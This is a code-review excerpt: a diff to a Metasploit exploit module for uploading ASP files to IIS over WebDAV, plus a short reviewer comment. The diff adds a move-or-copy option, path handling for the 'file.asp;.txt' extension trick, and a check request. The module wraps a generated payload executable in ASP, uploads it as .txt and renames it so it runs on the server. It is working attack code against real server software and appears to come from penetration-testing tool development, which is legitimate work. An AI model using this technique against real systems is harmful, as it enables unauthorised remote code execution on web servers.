modules/exploits/windows/iis/iis_webdav_upload_asp.rb

```diff
@@ -40,21 +40,51 @@ def initialize
 
     register_options(
       [
-        # The USERNAME and PASSWORD are registered again to make them more obvious they're
-        # configurable.
-        OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
-        OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
-        OptString.new('PATH', [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp'])
+      # The USERNAME and PASSWORD are registered again to make them more obvious they're
+      # configurable.
+      OptString.new('USERNAME',
+        [false, 'The HTTP username to specify for authentication', '']),
+      OptString.new('PASSWORD',
+        [false, 'The HTTP password to specify for authentication', '']),
+      OptString.new('PATH',
+        [ true,  "The path to attempt to upload", '/metasploit%RAND%.asp']),
+      OptEnum.new('METHOD',
+        [true, 'Move or copy the file on the remote system from .txt -> .asp', 'move', ['move','copy']])
       ], self.class)
   end
 
   def exploit
-
     # Generate the ASP containing the EXE containing the payload
     exe  = generate_payload_exe
     asp  = Msf::Util::EXE.to_exe_asp(exe)
     path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
-    path_tmp  = path.gsub(/\....$/, ".txt")
+    path = "/" + path if path[0] != "/"
+    # Incase of "/path/to/filename.asp;.txt"
+    path_tmp = "/" + File.basename(path.gsub(/\;.*/,''), ".*") + ".txt"
+    path_tmp = File.dirname(path) + path_tmp if File.dirname(path) != "/"
+    action = datastore['METHOD'].downcase.gsub('e','') + "ing"
+    alt_method = "move"
+    alt_method = "copy" if datastore['METHOD'].upcase == "MOVE"
+
+    #
+    # CHECK
+    #
+    print_status("Checking #{path}")
+    res = send_request_cgi({
+      'uri'          =>  path ,
+      'method'       => 'GET',
+    }, 20)
+
+    if (!res)
+      print_error("Connection timed out while trying to checking #{path}")
+      return
+    end
+
+  if (res.code == 200)
```

Comment:
Nice catch.
Will fix it in the next commit - and just for the case of closing some of the comments, will alter them too ;)